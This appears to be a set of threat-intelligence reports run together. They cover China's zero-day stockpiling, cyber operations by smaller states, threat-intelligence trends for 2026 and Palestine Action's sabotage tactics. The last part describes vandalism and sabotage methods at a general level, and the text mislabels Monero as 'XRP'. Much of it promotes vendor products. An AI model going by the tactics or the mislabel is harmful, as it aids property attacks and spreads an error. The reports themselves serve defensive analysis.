This centralized vulnerability ecosystem is producing measurable results, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited Ivanti VPN and Trimble Cityworks (1, 2) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.

China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.

Figure 2: Number of new CNNVD TSUs by month, June 2021 to July 2025 (Source: Natto Thoughts)

Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to decline, indicating that a larger share of discoveries is now being routed internally rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to no details about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.

Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.

Strategic Stockpiling and Selective Use

China’s reported use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.

Figure 3: Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)

Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.

Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.

Military Integration and Strategic Significance

China’s April 2024 military reforms introduced three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:

• The Information Support Force (ISF), which is responsible for the security and continuity of China’s military networks, data systems, and command infrastructure
• The Cyberspace Force (CSF), which is dedicated to both offensive and defensive cyber operations

Together, the two units consolidate China’s cyber and information capabilities, which were previously primarily nested under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.

Figure 4: New structure of the People’s Liberation Army (PLA) (Source: The Jamestown Foundation)

The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as future unification with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s coordinated cyber-military campaigns in Ukraine. Chinese state-sponsored Volt Typhoon activity has been widely assessed as fulfilling such a purpose.

Outlook

• Increased Willingness to Use Zero-Days: As China reduces its reliance on US technology through its “Delete America” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.
• Expanded Pre-Positioning: Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.
• Increased N-day Use: The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.
• Evolving Contractor Ecosystem: State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.

Mitigations

• Adopt an “Assume Breach” Posture: Implement zero-trust architectures that enforce identity and device verification at every access point. Use Recorded Future® Threat Intelligence to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.
• Prioritize Edge and Enterprise Patching: Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use Recorded Future Vulnerability Intelligence to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.
• Detect Post-Exploitation Behavior: Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with Recorded Future Attack Surface Intelligence to identify exposed assets and verify that detection coverage extends to externally facing environments.
• Secure Identities and Access: Leverage Recorded Future Identity Intelligence to detect compromised credentials that may complement exploit-based intrusions.

Risk Scenario

EnerTech Global, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.

First-Order Implications

Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.

A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.

Organizational Risks:

• Operational: Compromise of development and production networks halts manufacturing and disrupts customer support operations.
• Legal: Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.
• Brand: Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.

Second-Order Implications

Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.

Organizational Risks:

• Operational: Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.
• Brand: EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.
• Legal: Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.

Third-Order Implications

Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.

Organizational Risks:

• Competitive: Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.
• Brand: Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.
• Legal: Multinational investigations and sanctions create enduring compliance exposure and financial penalties.

Further Reading

• China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions
• Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group
• From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations
• China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
• China’s new Information Support Force

Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to proactively assess their geopolitical risk to understand where future threats are most likely to emerge.

In 2025, Recorded Future identified at least twenty actors across thirteen “non-Big Four” countries conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.

Companies should closely monitor regional geopolitics and maintain strong continuity and resilience plans to protect against cyber espionage or disruptive cyberattacks.

Figure 1: Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)

Analysis

Overview of Other State Sponsors of Cyber Operations

While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely varies. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.

Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most cyber-capable states invest heavily in avoiding detection and attribution, given the significant negative political consequences of exposure.

Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.

Regional Cyber Conflicts

Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.

India and Pakistan

Between May 7 and 10, 2025, India and Pakistan exchanged a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, primarily DDoS and website defacements. Pakistan-linked APT36 conducted espionage operations targeting the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani military targets.

Figure 2: Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source: Recorded Future)

Influence operations intended to shape perceptions of the conflict also intensified. Influence networks amplified hacktivist claims, often overstating their impact, such as widespread reporting on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.

Thailand and Cambodia

Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns significantly escalated between Thai hackers and Cambodian hackers following the May 2025 conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted hack-and-leak operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.

Morocco and Algeria

While tensions between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, striking the National Social Security Fund, the National Agency for Land Conservation, and the Ministry of Justice. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with retaliatory data breaches against the Algerian government and education institutions.

Espionage Operations Outside of Armed Conflict

While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:

• While India-linked threat actors such as SideWinder and Bitter have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities increased significantly in 2024, demonstrating a broader targeting scope.
• Vietnam has accelerated its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out operations against Chinese cybersecurity researchers as well as against internal dissidents. In the past, this group has also targeted car manufacturers, foreign governments, and others, driven by geopolitical and economic priorities.
• At least two threat actor groups observed conducting espionage operations have been linked to Türkiye: Marbled Dust and StrongPity, who prioritize regional and domestic targets. In addition, a robust online community of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).
• Stealth Falcon, linked to the United Arab Emirates, has been observed exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.

Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.

Domestic Surveillance Activity

Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s Predator or Candiru’s DevilsTongue. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections pose an increased risk of intrusive cyber monitoring and surveillance.

Figure 3: (Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors

(Source: Recorded Future)

Outlook

• Cyberattacks are likely to increase as international alliances weaken: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations decreased by 40% over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.
• Cyber capability build-up may follow conventional military build-up: NATO countries in Europe, as well as South Korea and Japan, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in Japan and South Korea, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.
• Commercial cyber capabilities may be sought for interstate conflict: Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the growing reliance on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.

Mitigations

• Use Recorded Future’s Geopolitical Intelligence to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.
• Use Recorded Future’s Threat Intelligence to track threat actor groups and detect TTPs associated with non-Big Four countries.
• Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the Geopolitical Intelligence module to assess surveillance and other travel risks.
• Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future Analyst-on-Demand for bespoke research on how your organization might be targeted.

Figure 4: Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)

Risk Scenario

A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.

First-Order Implications

Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.

• Competitive disadvantage: Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.
• Increased surveillance risk: The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.

Second-Order Implications

Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.

• Operational disruption: The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.
• Physical security risk: Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.

Third-Order Implications

The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.

• Conflict escalation: With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.
• Regional economic impact: Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.

Further Reading

• Influence Operations and Conflict Escalation in South Asia
• New APT32 Malware Campaign Targets Cambodian Government
• From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities
• Current Trends in the Turkish Language Dark Web

The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.

The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.

This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.

Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.

Key Trends Driving Threat Intelligence Evolution

There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.

• Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
• Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
• Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
• Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).

Challenges Holding Team Backs Today

Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.

• Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
• Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
• Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
• Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.

These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.

Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned

In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).

Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.

Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.

Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.

Implications for 2026 Security Budgets and Investments

As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.

One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.

Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.

Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.

That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.

Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.

Charting the Course to 2026

Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.

By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.

So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.

With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.

Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.

Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.

Key Findings

• Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
• Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
• The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
• The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
• In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.

Palestine Action: History and Terrorism Designation

Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.

Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”

The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.

Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)

The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.

Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.

However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”

Figure 2: Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)

Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its de facto moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.

Palestine Action’s Tactics, Techniques, Procedures, and Targets

Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.

Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.

Direct Action TTPs

Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:

• Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.
• Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.
• Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.
• Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
  • If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.
  • If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.

Vandalism

Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.

